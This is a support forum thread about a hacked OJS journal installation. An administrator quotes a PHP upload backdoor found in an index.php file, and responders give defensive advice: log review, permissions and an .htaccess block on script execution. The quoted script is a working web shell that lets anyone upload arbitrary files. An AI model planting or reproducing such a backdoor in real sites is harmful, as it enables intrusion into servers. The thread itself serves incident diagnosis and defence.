FILE folder hacked

Software Support
,
1

Problem: FILE folder hacked.

Hello, yesterday I found it was not possible to upload files to galleys (HTTP error). I was looking for the reason (server error log, php setup… fileopen was enabled). Consequently I found it is not possible to access published articles in present issue and archived issues too. Consequently I looked to the FILE folder and found the problem. The default article folder was renamed. There was some index.php file with the following script:

<?php if(isset($_GET['?blankkosong'])) { echo " "; echo "
"; if ($_FILES["file"]["upload"] > 0) { echo " " . $_FILES["file"]["upload"] . "
"; } else { echo " " . $_FILES["file"]["name"] . "
"; } if (file_exists("" . $_FILES["file"]["name"])) { echo $_FILES["file"]["name"] . " already exists "; } else { move_uploaded_file($_FILES["file"]["tmp_name"], "" . $_FILES["file"]["name"]); } } ?>

Is it a security problem related to our server or is it a PKP OJS problem (we are using the last version)?
We have the file folder located outside the installation folder.

2

Hi @Potravinarstvo1,

Is the files folder in a non-web-accessible location or protected from direct access?

3

Yes the folder is not directly accessible, we have .htaccess file in this folder.

4

So the files folder is in the web root? Do directives in .htaccess file prohibit the execution of scripts uploaded to the files folder?
I recommend also reading this post: Security issue: hacking of OJS 3.0.1 via submission - #5 by ctgraham

5

Check the log files, find where the file was downloaded from. How often the file was accessed and what else was loaded. Use folder permissions 0755. Use file execution block:

<FilesMatch "\.((php[0-9]?)|p?html?|pl|sh|java|cpp|c|h|js|rc)$">
    SetHandler None
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine Off
 
</IfModule>
6

OK - the problem solved. We had installed one wordpress site in the same location as PKP OJS. This wordpress site was infected with malware. Consequently this malware affected the File folder.
We have removed this site and restored the site from backup.

1 Like